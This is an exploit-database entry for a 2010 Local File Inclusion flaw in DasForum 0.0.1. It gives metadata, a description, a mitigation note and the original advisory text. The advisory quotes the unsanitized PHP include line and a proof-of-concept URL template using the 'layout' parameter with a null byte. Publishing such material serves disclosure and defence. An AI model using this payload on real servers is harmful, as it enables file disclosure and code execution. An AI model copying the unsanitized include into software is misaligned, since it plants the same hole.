header-logo
Suggest Exploit
vendor:
DasForum
by:
cr4wl3r
7,5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: DasForum
Affected Version From: 0.0.1
Affected Version To: 0.0.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

DasForum (layout) Local File Inclusion Exploit

DasForum is vulnerable to a Local File Inclusion vulnerability due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious 'layout' parameter value. This will allow the attacker to include arbitrary local files on the server, which can lead to the disclosure of sensitive information or the execution of arbitrary code.

Mitigation:

Input validation should be used to prevent the inclusion of maliciously crafted input. Sanitize user-supplied input to prevent malicious input from being passed to the application.
Source

Exploit-DB raw data:

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   |   DasForum (layout) Local File Inclusion Exploit   |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------
[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Download: http://mirror.vocabbuilder.net/savannah/dasforum/
[!] Version: 0.0.1
[!] Date: 15.01.2010
[!] Remote: yes


[!] Vulnerability Code [bbcode_inputs.php] :

    include("layouts/".$layout."/bbcode_inputs.php");


[!] PoC:

    [DasForum_path]/bbcode_inputs.php?layout=[LFI%00]

Navigation

Suggest Exploit

Services By CQR